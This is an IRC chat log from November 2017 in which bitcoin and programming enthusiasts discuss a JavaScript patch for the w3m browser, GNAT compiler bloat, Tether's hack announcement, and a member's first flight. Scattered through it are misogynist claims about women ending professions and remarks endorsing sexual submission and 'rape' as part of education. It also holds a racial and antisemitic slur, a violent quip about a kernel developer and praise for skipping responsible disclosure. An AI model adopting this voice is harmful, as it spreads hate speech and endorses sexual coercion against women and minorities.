steps at http://archive.is/UFpsz work only visiting e.g. http://trilema.com/2014/the-woes-of-altcoin-or-why-there-is-no-such-thing-as-cryptocurrencies/#selection-21.75-21.93 gives the following error: "The requested fragment 1741335;1511199634;spyked;"#selection-21.75-21.93" doesn't exist." (which leads me to believe that no JavaScript code is being run, although JavaScript *is* enabled at run-time!); links (probably mircea_popescu's browser) throws out some explicit javascript errors (doesn't parse === token), but this because it has it's own parser/interpreter. 1741336;1511199682;mircea_popescu;ugh 1741337;1511199740;mircea_popescu;now this i have nfi why would occur. the exact details are buried somewhere in archives, but it's been a while ;/ 1741338;1511199913;shinohai;For a while I really liked the w3m browser, there was rumored to be js plugin for it, though link to original www is ded and I cannot find info on it anywhere. 1741339;1511199980;*;spyked dug for that one as well (w3m-js), seems to be gone 1741340;1511200067;shinohai;If you happen to dig it up at some point, I would greatly appreciate copy 1741341;1511200206;ben_vulpes;https://makezine.com/2017/11/19/apology-to-naomi-wu/ << the self flagellation will continue until morale improves 1741342;1511200253;asciilifeform;whossat 1741343;1511200274;asciilifeform;'she and other Chinese makers are every bit as capable and creative as their Western counterparts' << ahahahahahawat 1741344;1511200302;asciilifeform;'We will be publishing a diversity audit of Make: as a company and our properties, and will be setting goals to drive progress on these issues' << самокритика !1111 1741345;1511200309;mircea_popescu;heh, the whole "drama" is by now legit kink play. 1741346;1511200351;trinque;"that was offensive to Naomi and all women" << it's a great day for canada, and therefore the world 1741347;1511200355;mircea_popescu;"it is always wrong to question female identity" === "oh baby give it to me hard". 1741348;1511200438;ben_vulpes;ahahand in tangentially related hate speech: "assortative coupling on education level does have an unintended down side -- it's a major contributor to economic inequality in the larger society", from https://www.edge.org/response-detail/26747 1741349;1511200439;mircea_popescu;there's some scene in some italian film in which a woman (who is trying to convince a guy she believes is a movie producer to take her pubescent daugther to the movie-making place) says "sfondami tutta". during copulation (she also offered to hold down same daughter for defloration). she does not literally mean that she wants him to tear her uterus through her abdomen and into the light. 1741350;1511200451;mircea_popescu;she's just saying a thing. so is this dale dougherty anon. 1741351;1511200543;asciilifeform;'The Mating Crisis Among Educated Women' << lol!! 1741352;1511200761;mircea_popescu;let me guess, "can't find enough males willing to support the fantasy" ? 1741353;1511200876;asciilifeform;howdjaguess, 'At the University of Texas at Austin where I teach, the sex ratio is 54 percent women to 46 percent men. This imbalance may not seem large at first blush. But when you do the math it translates into a hefty 17 percent more women than men in the local mating pool. Speculations about reasons range widely. They include the gradual removal of gender discrimination barriers and women’s higher levels of conscientiousness (r 1741354;1511200877;asciilifeform;elative to men’s) that translate into better grades and superior college app qualifications' etc 1741355;1511200940;ben_vulpes;!!up mircea_popescu 1741356;1511200940;deedbot;mircea_popescu voiced for 30 minutes. 1741357;1511200954;ben_vulpes;lizards dun like it when you talk like that mircea_popescu 1741358;1511200970;mircea_popescu;lel 1741359;1511201110;mircea_popescu;asciilifeform cuz i'm knee deep in "educated" womenz shattered delusions. 1741360;1511201148;mircea_popescu;!~calc 54-46 1741361;1511201150;jhvh1;mircea_popescu: 54-46 = 8 1741362;1511201154;mircea_popescu;!~calc (54-46)/46 1741363;1511201155;jhvh1;mircea_popescu: (54-46)/46 = 0.17391304347826086 1741364;1511201193;mircea_popescu;that's so clever. 1741365;1511201228;mircea_popescu;the writing is on the wall : whenever women become dominant in [what used to be] a profession, that profession ends. 1741366;1511201236;mircea_popescu;eg, textile making survived for as long as weavers were men. 1741367;1511201239;mircea_popescu;1700s. 1741368;1511201253;mircea_popescu;so -- get ready for no moar academia, very much in liune with trilema bull on topic. 1741369;1511201317;asciilifeform;lol wat 'get ready', it happened long ago 1741370;1511201343;mircea_popescu;what happened a few decades ago was the transition to the macgonagall stage, so to speak. first clowns take over, then women. 1741371;1511201428;asciilifeform;interestingly they also doctor the Official stats re subj : a casual walk through u of md reveals ~70+% femality, but Official figure, last i saw, was 49 or somesuch 1741372;1511201442;asciilifeform;hatefact. 1741373;1511201518;mircea_popescu;no but see, hos moar "conscientious" than bros. 49% female faculty = 70% female campus walkers. because they put in more hours etc. 1741374;1511201544;asciilifeform;mircea_popescu: the men leave when a profession is deskilled. at least in the weaver example. 1741375;1511201589;shinohai;!~later tell spyked I managed to find archive of w3m-js patch (for v 0.4) http://wotpaste.cascadianhacker.com/pastes/OFXDG/?raw=true 1741376;1511201589;jhvh1;shinohai: The operation succeeded. 1741377;1511201608;shinohai;My Japanese reading is shit, so dunno how results mite be yet 1741378;1511201647;mircea_popescu;some of them, at least. 1741379;1511201723;asciilifeform;re asciilifeform's local shithole, moar interesting observation -- at one time the comp sci dept was ~90% male. today -- after subjects like 'operating systems', 'compilers' -- where you gotta form a working mental model of what the fuck yer doing, or you have no chance , and the working material is not amenable to 'i'ma randomly hammer until it works' -- no moar. 1741380;1511201756;asciilifeform;*after subjects abolished 1741381;1511201764;mircea_popescu;honestly, i see no problem with this. 1741382;1511201789;mircea_popescu;education should not be available via "public" ie tax-subsidized channels. let woman that wants to actually learn anything find a master and submit sexually. 1741383;1511201794;mircea_popescu;what fucking college. harem. 1741384;1511201804;asciilifeform;afaik the 'private' unis are exactly same, but with fatter idjits 1741385;1511201813;mircea_popescu;my private uni is not at all same. 1741386;1511201872;mircea_popescu;explicit power relations, including rape as a definite portion of the curricula, all that good stuff. 1741387;1511202003;asciilifeform;lol it'll be the translationdictionary dirigible thread alloveragain won't it. 1741388;1511202020;mircea_popescu;ra ra ra!! 1741389;1511202020;asciilifeform;'what if i need to hire some engineers and dun have a harem' 'slice lengthwise!!' 1741390;1511202041;mircea_popescu;if you perceive you might need engineers in winter, wolfy, start building harem in summer. 1741391;1511202054;mircea_popescu;if you wait to sharpen your fangs until you have what to use them on... you won't have the time! 1741392;1511202124;asciilifeform;this is yet another of those occasions when asciilifeform is half-convinced mircea_popescu posts from a parallel dimension, where females who can keep e.g. 100-state fsm in their skull, are something other than 1 ppb 1741393;1511202157;mircea_popescu;so ? filter! 1741394;1511202168;mircea_popescu;and train. 1741395;1511202186;asciilifeform;fwiw not only does mircea_popescu not keep those in his harem, but wouldn't want to . high testosterone ( ever see portrait of e. noether ? ) 1741396;1511202267;mircea_popescu;why not ? 1741397;1511202290;asciilifeform;http://btcbase.org/log/2017-06-30#1677914 << thread 1741398;1511202290;a111;Logged on 2017-06-30 21:05 asciilifeform: ( revisiting upstack: one sad irony of beelzebub : the world-class chix, e.g. emmy noether, tend to be square faces. testosterone will do that. ) 1741399;1511202300;mircea_popescu;it's a harem not a fucking advertisment. you can keep whatever you like. 1741400;1511202307;asciilifeform;but wouldja ? 1741401;1511202312;mircea_popescu;noether ? yes. 1741402;1511202336;mircea_popescu;ugly-and-not-noether no. but, hard to argue against the company of smart chicks. 1741403;1511202367;asciilifeform;then nao we know where the planet's 2.5 allotted noethers went!111 1741404;1511202378;mircea_popescu;i'm not THAT attractive. 1741405;1511202437;asciilifeform;sad thing is, 'noethers' have a tendency to die fairly young and virgo intacta 1741406;1511202447;mircea_popescu;also, the testosterone issue is visible in much older women. when she was 16, noether was as much helped by the 16 yo's boon as any other girl. 1741407;1511202465;mircea_popescu;the moustache appears later. 1741408;1511202466;asciilifeform;possibly. afaik no photo of 16-noether survives. 1741409;1511202664;mircea_popescu;all this aside, i'm very performance driven. i care much more about what she does than what she looks like. which is why djb, sexy as she might be, has nevertheless 0 hot factor for me. ill behaved / stupid hotties are not hot to any degree i can personally measure. 1741410;1511202683;mircea_popescu;others' mileage may vary, of course. but as far as i'm concerned... 1741411;1511202689;asciilifeform;waiwho 1741412;1511202695;mircea_popescu;bernstein. 1741413;1511202704;asciilifeform;i thought bernstein were a bloke 1741414;1511202711;mircea_popescu;im making a metaphorical bridge. 1741415;1511202715;asciilifeform;lolk 1741416;1511202744;mircea_popescu;there's no "ill make myself beautiful and then win" solipsistic approach. make yourself really obedient and you'll win. 1741417;1511206764;diana_coman;mircea_popescu> the writing is on the wall : whenever women become dominant in [what used to be] a profession, that profession ends. <- more like whenever *everyone* makes it into something, it's a clear bet that it's not anymore the something it used to be 1741418;1511206840;mircea_popescu;what do you mean moreover ? 1741419;1511206867;diana_coman;moreover? 1741420;1511206964;diana_coman;I guess you can take "women become dominant" as visible threshold of "everyone makes it" but to my eyes that's already late as it were; profession ended long time before that 1741421;1511207036;mircea_popescu;aha. 1741422;1511207071;mircea_popescu;it's forcing a point, cooking for instance didn't end with women becoming dominant sometime cca 35k years ago 1741423;1511207083;mircea_popescu;but for many modern and postmodern activities it's a great heuristic. 1741424;1511207107;diana_coman;dunno the facts there, but afaik professional cooks are still majority men, aren't they 1741425;1511207147;mircea_popescu;ok. professional fuckers -- majority women. 1741426;1511207150;diana_coman;lol 1741427;1511207151;mircea_popescu;fucking didn't end either. 1741428;1511207208;diana_coman;but yes, that's my point: it's nothing to do with women per se being there; all to do with lowering the bar 1741429;1511207255;shinohai;lowering bar so black girls can code? 1741430;1511207258;mircea_popescu;but the lowering of the bar ends up hitting women 1741431;1511207284;diana_coman;well, it ends up hitting everyone at that, doesn't it? 1741432;1511207291;diana_coman;who the hell does it help exactly 1741433;1511207336;diana_coman;oh, it helps to pretend for a bit longer and then fall from the top of a higher cliff; is that the help? 1741434;1511207360;mircea_popescu;that's the sadness of evo biology : if you have a sexuate species (as the predicate) then you will have sexual dismorfism. because if you don't, why bother with sexuation. if you have sexual dismorfism, you will have a more diverse and a less diverse gender. because that's what dismorfism IS. if you conventionally name the more diverse gender male (as you do) and the less diverse gender female (as you do), then NECESSARILY as 1741435;1511207360;mircea_popescu; you lower the bar for any objective performance you will get more women qualified ; and conversely the only way to increase female prevalence in any activity is to lower the performative bar. 1741436;1511207721;diana_coman;I can't say I really looked into this; I do remember your trilema article on this idea re searching in the male gender 1741437;1511207773;mircea_popescu;myeah 1741438;1511207871;diana_coman;to start with I'm not sure there is such total separation between genders as in searches in male gender means advances do not translate further down the line in moving up the average on female gender too , for instance 1741439;1511207908;diana_coman;and then there are anyway tradeoffs at all points; e.g. male stronger, yes; but generally less agile 1741440;1511208075;diana_coman;diversity means it covers a wider range; doesn't necessarily mean average is higher 1741441;1511208381;mircea_popescu;possibly move the average, but it's still not going to have an impact. women alive today compete with people alive today not with the previous generations 1741442;1511208447;mircea_popescu;and average doesn't have to be higheer, at all. if five men are measured by your criteria as 12, 11, 10, 9, 8 and five women are measured 10.5, 10.4, 10.3, 10.2 and 10.1, the female average is still way over the male average and yet the first two Xs will be men. 1741443;1511208506;mircea_popescu;not to mention the top-3 men average will beat the shit out of the top-5 or top-3 women average, which is the problem in academia. 1741444;1511208538;mircea_popescu;exclusion is much more effectual tool in male than female petri dish, which is why men fight and women gossip. 1741445;1511208591;trinque;male filtering being lossy, females costing more to lose biologically 1741446;1511208721;mircea_popescu;right. 1741447;1511208983;diana_coman;ah, there is that, certainly 1741448;1511209005;mircea_popescu;it's all there is ; then people wrangle themselves into a tizzy trying to "fix" the unfixable. 1741449;1511210178;asciilifeform;meanwhile, in rotakudom, http://users.utcluj.ro/~jdomokos/naviro ( in particular interest http://users.utcluj.ro/~jdomokos/naviro/naviro138500.dict ) 1741450;1511210219;asciilifeform;specifically in re http://btcbase.org/log/2017-11-20#1740925 1741451;1511210219;a111;Logged on 2017-11-20 01:01 mircea_popescu: now, i would much appreciate if you took the current bs and ipa'd it properly (it's not THAT hard, ro ipa set is narrow and unambiguous) 1741452;1511210255;mircea_popescu;o hey 1741453;1511210270;asciilifeform;mircea_popescu: you don't perchance know the fella ? having studied at cluj 1741454;1511210355;asciilifeform;https://sci-hub.cc/http://ieeexplore.ieee.org/document/5940736/?arnumber=5940736 << d00d's algos ( warning -- pdfturd ) 1741455;1511210379;asciilifeform;( spoiler: he trained a nn ) 1741456;1511210393;asciilifeform;feedstock was that very same Dex 1741457;1511210417;mircea_popescu;asciilifeform postdoc student ; after my time 1741458;1511210423;asciilifeform;aaa 1741459;1511210425;asciilifeform;'Based on the input grapheme codes, the neural networks generate one by one the 30 bit code indicating the presence or the absence of the 30 articulatory features. The output feature vectors are compared with the encoded vectors of the phonemes used. The distance between the output vector and each coded vector is calculated using Manhattan distance function and the system response is chosen as the vector with the smallest distance. T 1741460;1511210425;asciilifeform;o develop the pronouncing dictionary we have used the largest online dictionary for Romanian language, the DexOnline dictionary [13]. DexOnline dictionary is freely available, can be downloaded from the Internet as a mysqldump generated SQL file and used in accordance with the terms of GNU General Public License. The database can be easily restored on a MySQL database server.' 1741461;1511210496;mircea_popescu;is that still tru ? 1741462;1511210507;asciilifeform;which 1741463;1511210519;mircea_popescu;item available 1741464;1511210755;asciilifeform;https://dexonline.ro/static/download/dex-database.sql.gz 1741465;1511210759;asciilifeform;274M 1741466;1511210762;mircea_popescu;uhm. 1741467;1511210769;mircea_popescu;check it out, ro language tripled in 7 years. 1741468;1511210778;asciilifeform;i've nfi what's in there, mebbe lolcat pics 1741469;1511210815;asciilifeform;( from https://wiki.dexonline.ro/wiki/Instruc%C8%9Biuni_de_instalare ) 1741470;1511211440;asciilifeform;meanwhile at the house of entomology, http://www.loper-os.org/?p=8&cpage=1#comment-18290 1741471;1511212644;mircea_popescu;in other long term lulz, https://archive.is/936Xp 1741472;1511212664;asciilifeform;lol!! 1741473;1511214200;shinohai;Follow-up from DJI tidbit asciilifeform posted a few days ago: http://archive.is/CuVRo 1741474;1511214265;asciilifeform;see also : 1741475;1511214270;asciilifeform;!#s responsible disclosure 1741476;1511214271;a111;22 results for "responsible disclosure", http://btcbase.org/log-search?q=responsible%20disclosure 1741477;1511214294;asciilifeform;( http://btcbase.org/log/2015-12-20#1348490 in particular. ) 1741478;1511214294;a111;Logged on 2015-12-20 17:54 asciilifeform: didn't we do a 'responsible disclosure'-is-for-idiots thread ? 1741479;1511214340;asciilifeform;what part of skip! straight! to! the! rape! is hard to understand. 1741480;1511214359;asciilifeform;and the moar public, the moar raw -- the moar educational. 1741481;1511215147;mircea_popescu;but education is specifically what's not sought. 1741482;1511215186;asciilifeform;from strict pest control pov -- same conclusion tho 1741483;1511215237;asciilifeform;( did we ever do the al schwartz crushed roach pheromone thread ? let it be said that even insect can sometimes 'learn from the death of others' ) 1741484;1511216952;ben_vulpes;'la resistance' vanguard suffers a casualty: http://www.businessinsider.com/new-york-times-suspends-glenn-thrush-amid-sexual-harassment-allegations-2017-11 1741485;1511221015;asciilifeform;meanwhile, from the dept of interesting but dead, http://adagin.blogspot.com 1741486;1511221068;asciilifeform;^ pretty detailed discussion of ada 'elaboration' arcana 1741487;1511221134;asciilifeform;typical, http://adagin.blogspot.com/2013/12/ada-2005-access-types-part-i.html , lively : type Hooker_Array is array (Positive range <>) of Hooker_Class_Ptr; procedure Violate_Bodies (x : Hooker_Array); ... 'We want to track all our victims, presumably in some sort of set or container, so that we might disinter them later as needed. Similarly, we might also want to do strange, awful things with the dead bodies of the hookers.' 1741488;1511222051;mircea_popescu;o.O 1741489;1511222763;shinohai;Is this why I like Ada now? 1741490;1511223678;BingoBoingo;I though you like them warm shinohai 1741491;1511223729;shinohai;I'm an entrepreneur though .... I might one day have need for a few ded ones. 1741492;1511225674;asciilifeform;in other noose HOLYMOTHEROFFUCK does gcc backend shit out liquishit , e.g., http://wotpaste.cascadianhacker.com/pastes/bP9jt/?raw=true 1741493;1511225761;asciilifeform;http://wotpaste.cascadianhacker.com/pastes/kise2/?raw=true << reminder, what it ate 1741494;1511225770;asciilifeform;motherfucking disgrace. 1741495;1511225791;asciilifeform;and this is on O2. 1741496;1511225939;asciilifeform;ooh and guess what, pragma Inline_Always(...) arbitrarily ( in some % of cases, prolly based on size of subprogram ) has the effect of... take a guess 1741497;1511226801;asciilifeform;... pretty depressing, and just about obscene, you could just about fit msdos mega-game DIGGER.COM in the space taken by gcc's notion of ffa_mul_comba ! 1741498;1511226893;asciilifeform;also gotta love gnat's ~total inability to keep range checks out of inner loopage 1741499;1511226921;asciilifeform;( blows the pipeline -- snail speed ) 1741500;1511228424;shinohai;http://archive.is/Byh5w <<< Roger Ver, source of endless lulz 1741501;1511229952;mircea_popescu;the part where the schmuck "bets" 25k btc... 1741502;1511229965;mircea_popescu;patrick thompson is more of a tool for repeating that sorta nonsense than ver himself. 1741503;1511230386;shinohai;Dear lord we need Qntra back. 1741504;1511230436;shinohai;https://coinmarketcap.com/currencies/useless-ethereum-token/ <<< I thought this was all of 'em 1741505;1511230460;shinohai;"Rank 944" lmao 1741506;1511232359;mircea_popescu;so apparently znort made a clean close of teh bitbet, neh ? 1741507;1511232543;asciilifeform;mircea_popescu: depends on which randos are telling the truth, which -- not, neh 1741508;1511232555;asciilifeform;~unknowable. 1741509;1511232603;mircea_popescu;easy to prove he didn't. 1741510;1511232615;asciilifeform;is it ? 1741511;1511232657;asciilifeform;nm i see it 1741512;1511232660;mircea_popescu;right. 1741513;1511234295;asciilifeform;meanwhile asciilifeform found one of the culprits of http://btcbase.org/log/2017-11-21#1741492 horror : https://gcc.gnu.org/onlinedocs/gnat_ugn/Validity-Checking.html#Validity-Checking 1741514;1511234295;a111;Logged on 2017-11-21 00:54 asciilifeform: in other noose HOLYMOTHEROFFUCK does gcc backend shit out liquishit , e.g., http://wotpaste.cascadianhacker.com/pastes/bP9jt/?raw=true 1741515;1511234518;asciilifeform;i had it set to max fascism. which explains why bounds of same item get checked again and again and again and... 1741516;1511234632;asciilifeform;... even of same params outside and then inside a funct call ! 1741517;1511234682;asciilifeform;who makes a compiler like this, and why, is anybody's guess. for all i know, we're the first folx ever to use gnat and at the same time give half a shit re speed. 1741518;1511234998;mircea_popescu;i don't think anyone uses ~most anything. 1741519;1511235192;asciilifeform;supposedly -- boeing uses. 1741520;1511237671;BingoBoingo;That's not very comforting for someone about to spend ~3/4 of a day in 737-800's 1741521;1511238381;BingoBoingo;But, drive's too long for this timeline and ticket is acquired 1741522;1511238724;asciilifeform;BingoBoingo: is this yer first voyage out of monkeystan or wat 1741523;1511238806;BingoBoingo;It is indeed. Also first voyage on an airplane. 1741524;1511238869;asciilifeform;woah i had nfi. 1741525;1511238892;BingoBoingo;Well, midwesterner. 1741526;1511238940;asciilifeform;lol i thought midwestern meant having ~own~ plane!1 1741527;1511238944;BingoBoingo;Poor child from poor family. 1741528;1511239001;BingoBoingo;Lol, some have own planes but of the cloth and tentpoles variety. Then again driving is less of a burden when 1 minute of time in vehicle translates into at least one mile of forward movement. 1741529;1511239071;asciilifeform;cloth an' stick sopwith -- quite respectable imho 1741530;1511239109;BingoBoingo;Usually powered by lawnmower type Briggs/Kohler/Honda motor 1741531;1511239129;asciilifeform;i saw one being flown in timişoara -- possibly literally a sopwith . buzzing the steeples. 1741532;1511239150;BingoBoingo;"Airport" down the road even claims to host world "powered parachute" thing 1741533;1511239298;lobbes;http://btcbase.org/log/2017-11-20#1741039 << buenos viajes, señor BingoBoingo 1741534;1511239298;a111;Logged on 2017-11-20 03:30 BingoBoingo: Arrival in Montevideo arranged for Dec 6th, at same time as departing prior day. 1741535;1511239521;BingoBoingo;The affair will be blogged. 1741536;1511239595;mircea_popescu;this is adorable. 1741537;1511239673;*;BingoBoingo will try to make it worth mp's generous funding 1741538;1511239763;BingoBoingo;The reaction of fellows from the BingoBoingo store have been especially adorable 1741539;1511239767;*;asciilifeform takes off hat , to BingoBoingo's courage 1741540;1511239807;ben_vulpes;cheers, BingoBoingo 1741541;1511239813;ben_vulpes;bon voyage, etc 1741542;1511239850;mircea_popescu;everything gotta have a first time... 1741543;1511239985;BingoBoingo;Aha, and in republic's state of necessity the dilemma is exactly http://trilema.com/2017/the-day-of-failure-trilemma/#identifier_6_74280 EXCEPT having partaken of the logs since 2013 and having done so sober since 2015, there is no accident of innocence which could excuse not going 1741544;1511240024;mircea_popescu;i can see it. 1741545;1511240122;BingoBoingo;Typical conversation at BingoBoingo store since turning in notice: "Wait, where are you going?" "Uruguay" "Where are you going to be working" "The Internet" "Why the fuck is there any interest in you going there" "I have a very particular set of skills" 1741546;1511240148;mircea_popescu;lol 1741547;1511240152;mircea_popescu;nb huh 1741548;1511240160;BingoBoingo;One girl has been joking that I must be CIA which is lol, because I am exact opposite. 1741549;1511240234;lobbes; [04:33:27] It is indeed. Also first voyage on an airplane. << damn. btw, if yer sinuses are as bad as mine the final descent (~30 mins) is usually accompanied by intense ear pain/itching. 1741550;1511240237;BingoBoingo;And to those who get more detail: "How do you know these people" "I've been doing writing and piece work for them off and on for some years, and now there's a need for more me" 1741551;1511240238;lobbes;I use to fly 4 flights a week for about a year straight for a previous gig (granted all short hops within empire). After much experimentation, best method I found for this was: 1) pop a pseudoephedrine or two a coupla hours before descent 2) RESIST all urges to fiddle with ears 3) fuck chewing gum; try and get a yawn-cycle going 1741552;1511240292;mircea_popescu;BingoBoingo sounds liek a movie script dunnit. 1741553;1511240316;BingoBoingo;mircea_popescu: Sure, but there's absolutely nothing easier to tell people than the truth 1741554;1511240319;mircea_popescu;lobbes from what i hear blowjobs are >>> chewing gum. 1741555;1511240358;lobbes;hue 1741556;1511240491;*;BingoBoingo today did pick up one pair of shoes without steel toes, so can board aircraft 1741557;1511240613;lobbes;what, tsa banning shoe classifications now? 1741558;1511240666;BingoBoingo;Of all the chances to not take with an indeterminate machine, that seems like an easy one to avoid 1741559;1511240800;*;BingoBoingo plans to pick up real shoes in Montevideo once real shoes are earned 1741560;1511240815;mircea_popescu;gotta earn teh realshoes. 1741561;1511240841;asciilifeform;BingoBoingo: could even pick up in buenos aires, at that place mircea_popescu mentioned in old thread 1741562;1511240888;BingoBoingo;asciilifeform: Gotta earn boat ride to Buenos Aires. 1741563;1511241236;BingoBoingo;!~ticker --market all 1741564;1511241243;jhvh1;BingoBoingo: Bitstamp BTCUSD last: 7904.0, vol: 11573.74144165 | Bitfinex BTCUSD last: 7925.0, vol: 59779.65877938 | Kraken BTCUSD last: 7933.0, vol: 3832.45561154 | Volume-weighted last average: 7922.17514786 1741565;1511243099;ben_vulpes;in other abusive workplaces: http://lkml.iu.edu/hypermail/linux/kernel/1711.2/01701.html 1741566;1511243293;mircea_popescu;dude should be given a shotgun, free buckshot and free airplane fares. 1741567;1511244785;davout;http://btcbase.org/log/2017-11-19#1740657 <<< hory shet 1741568;1511244785;a111;Logged on 2017-11-19 13:55 mircea_popescu: scroll down to where it says CTO : mike_c 1741569;1511245867;deedbot;http://trilema.com/2017/biodiversidad-y-technodiversidad-no-mom/ << Trilema - Biodiversidad y technodiversidad. No mom. 1741570;1511246088;mod6;ya, dafaq 1741571;1511246261;ben_vulpes;why is this so surprising? he hasn't been involved in republican affairs since some time after wol wound down 1741572;1511246295;ben_vulpes;the hyenas of the empire lurk, waiting to pick us off one by one if they can 1741573;1511246803;ben_vulpes;also look at these fools smokin the cockchain: http://cloudmo.de/ 1741574;1511247328;*;BingoBoingo now needs to earn a winch stair 1741575;1511247967;ben_vulpes;https://tether.to/tether-critical-announcement/ << see this is so much the opposite of a 'crypto currency' 1741576;1511248078;ben_vulpes;these slime are un-ticking ~every box. and i guess this is unsurprising because socialism clouds memetic space until nobody even remembers, however many years later /what the fuck was so cool about bitcoin in the first place/ 1741577;1511248093;ben_vulpes;whole thing devolves into 'i r wrote software and then the bad thing happened because of bad people!' 1741578;1511248204;ben_vulpes;asciilifeform: look when there's actual even halfway sorta (((cryptocurrency))) involved, no responsible disclosure will ever happen 1741579;1511248295;ben_vulpes;hilarious indictment of value of us citizen "information", "servers" 1741580;1511248323;ben_vulpes;bullshit made up deliberately hamstrung cryptocurrencies it turns out are way better than anything dear usg has to offer 1741581;1511248433;ben_vulpes;this is a hilarious curveball to throw civvies: "but i thought you were so virulently anti-altcoin?" "no man," long drag on cigarette, "you gotta realize that even the dipshittiest, hilariously self-critting piece of nonsense like the thing that self-advertised as usgcoin /is still a better buy than usg fictions like the 'roth ira'" 1741582;1511248817;BingoBoingo;Still, if buying into the IRA/401k dream, gotta go to Roth 1741583;1511250159;BingoBoingo; the hyenas of the empire lurk, waiting to pick us off one by one if they can << Hynenas of empires, slugs of ownbrain, particuly adorable yet hungry excretions from girl you've become fond of. Many hazards to republic 1741584;1511254080;spyked;http://btcbase.org/log/2017-11-20#1741375 <-- danke! will try it out later today. 1741585;1511254080;a111;Logged on 2017-11-20 18:13 shinohai: !~later tell spyked I managed to find archive of w3m-js patch (for v 0.4) http://wotpaste.cascadianhacker.com/pastes/OFXDG/?raw=true 1741586;1511265653;mircea_popescu;lol ben_vulpes . "the title of hyena of the empire and a cash prize of 500 botswanan pula is hereby bestowed upon joe schmoe." 1741587;1511268383;mircea_popescu;BingoBoingo it's dangerous, that shit, esp in a country where the only style of maintenance is "is it broken y/n". 1741588;1511268466;mircea_popescu;http://btcbase.org/log/2017-11-21#1741575 << https://archive.is/fhtuw teh cloudflare or teh bad gateway ? 1741589;1511268466;a111;Logged on 2017-11-21 07:06 ben_vulpes: https://tether.to/tether-critical-announcement/ << see this is so much the opposite of a 'crypto currency' 1741590;1511268577;mircea_popescu;"Tether issuances have not been affected by this attack, and all Tether tokens remain fully backed by assets in the Tether reserve." lmao what TEH FUCK is this supposed to mean! they just announced that a) tether issuances have been affected and b) tether tokens no longer backed. 1741591;1511268603;mircea_popescu;"oh you know what ? let's now STEAL THE HAVING STOLEN, too!!11". dorks. 1741592;1511268668;mircea_popescu;"will provide further updates AS THEY become available". disavowal overdrive, what the fuck, THE UPDATES are the agent here ? they make themselves avaoilable like elliott's girlfriends ? 1741593;1511268704;mircea_popescu;"rectify the situation in the best possible manner to everyone's benefit" in the sense of an everyone*, specially defined, niggers-fatties-and-jews=everyone* ? 1741594;1511268723;mircea_popescu;this is america. 100%, 2017. 1741595;1511268941;mircea_popescu;http://btcbase.org/log/2017-11-21#1741581 << tis a point. 1741596;1511268941;a111;Logged on 2017-11-21 07:13 ben_vulpes: this is a hilarious curveball to throw civvies: "but i thought you were so virulently anti-altcoin?" "no man," long drag on cigarette, "you gotta realize that even the dipshittiest, hilariously self-critting piece of nonsense like the thing that self-advertised as usgcoin /is still a better buy than usg fictions like the 'roth ira'" 1741597;1511269048;mircea_popescu;http://btcbase.org/log/2017-11-21#1741576 << this being, of course, why the "no updates" thing is such a thorn in the side of the fiatist mind. if we DID updates, (NO MATTER WHICH!!!! even if we only did the reasonable ones!) then there'd be the sort of ~continuity~ that's the paramount ingredient in socialist reconstructions of the world, whereby "progress" and "i can't understand what those women of like... more than 20 yea 1741598;1511269048;a111;Logged on 2017-11-21 07:07 ben_vulpes: these slime are un-ticking ~every box. and i guess this is unsurprising because socialism clouds memetic space until nobody even remembers, however many years later /what the fuck was so cool about bitcoin in the first place/ 1741599;1511269048;mircea_popescu;rs ago EVEN LIVED, what do you mean they had it way better than me." 1741600;1511270520;spyked;http://btcbase.org/log/2017-11-20#1741375 <--> http://p.bvulpes.com/pastes/mg2Q1/?raw=true same item applied upon w3m-0.5.3. warning: ./configure script is very-very hack-ish (read coad before trying out!). libjs comes from 'NJS interpreter', compiles and runs. unfortunately trilema fragments still don't get highlighted in my terminal (but if it does work for anyone else, do let me know). 1741601;1511270520;a111;Logged on 2017-11-20 18:13 shinohai: !~later tell spyked I managed to find archive of w3m-js patch (for v 0.4) http://wotpaste.cascadianhacker.com/pastes/OFXDG/?raw=true 1741602;1511270693;spyked;I'll get back to the "working cli/tui js browser" problem later, back to adalisp for now. 1741603;1511272201;mircea_popescu;le suck. 1741604;1511272314;shinohai;Appears on r/buttcoin this morning someone sent 500k in btcrash to a segwit addy by accident. 1741605;1511272325;mircea_popescu;is this a bad thing ? 1741606;1511272335;shinohai;No, it's fucking hilarious. 1741607;1511272405;shinohai;But I'm not sure how BCH could be sent to addy on another network in the first place. 1741608;1511272802;mircea_popescu;if they use the same address format... 1741609;1511272825;mircea_popescu;correct statement is "dood sent bch to an address he didn't control that he came up with by copy/pasting something he didn't understant" 1741610;1511273060;jurov;shinohai: yes, the addresses are the same, For Improved Headache. 1741611;1511273114;jurov;also, there's "bitvoin gold" pump going too, apparently it's possible to exchange for BTC the same way as BCH, will be looking into it 1741612;1511273252;shinohai;Top minds 1741613;1511274742;asciilifeform;https://archive.is/N6Kgi << ahahahahahaha 1741614;1511274757;asciilifeform;'the first SegWit address whose funds were recovered' 1741615;1511274784;asciilifeform;'we helped a user recover the coins by mining the tx without broadcasting it. can help others who need help' 1741616;1511274815;asciilifeform;i.e. a segshitness magicked away by chinese 'for greater good' 1741617;1511274915;mircea_popescu;aww 1741618;1511274943;asciilifeform;( in re http://btcbase.org/log/2017-11-21#1741604 ) 1741619;1511274943;a111;Logged on 2017-11-21 13:51 shinohai: Appears on r/buttcoin this morning someone sent 500k in btcrash to a segwit addy by accident. 1741620;1511276138;mircea_popescu;asciilifeform amusingly, just what we said was gonna happen ? 1741621;1511276162;mircea_popescu;basically, they had all the lohtron ready and oiled, sadly no sheep went that way, trying to get as much as possible out of its functionings anyway ? 1741622;1511276167;mircea_popescu;AWWW! 1741623;1511277071;deedbot;http://trilema.com/2017/why-would-any-girl-want-to-be-a-slave/ << Trilema - Why would any girl want to be a slave ?! 1741624;1511278412;asciilifeform;mircea_popescu: i have a bit of difficulty wrapping head around this scene -- picture the convo, 'hey y'know what they'll luvvv?' 'i know! for transactions to be REVERSIBLE!11 by some chinese d00d!' 1741625;1511278468;mircea_popescu;they're terrible at planning, if the constant strategic superiority saga wasn't suggesting it. 1741626;1511278490;asciilifeform;incidentally, anybody bother lately to add up how much anyonecanspendolade in typical block ? 1741627;1511278506;mircea_popescu;unbeaten kids can't plan, is the truth of the matter. they get too wrapped up in their narcissistic desires and then before you know it newton sits down to discover the theory of how right they are. 1741628;1511278513;asciilifeform;( last i saw, there was a hefty bit ) 1741629;1511278535;mircea_popescu;a hefty bit of bytes , but dust 1741630;1511278630;asciilifeform;and gotta luvv folx who see 'hefty bit of bytes, but dust' and then ask for proofier proof when presented with 'miners are wreckers' 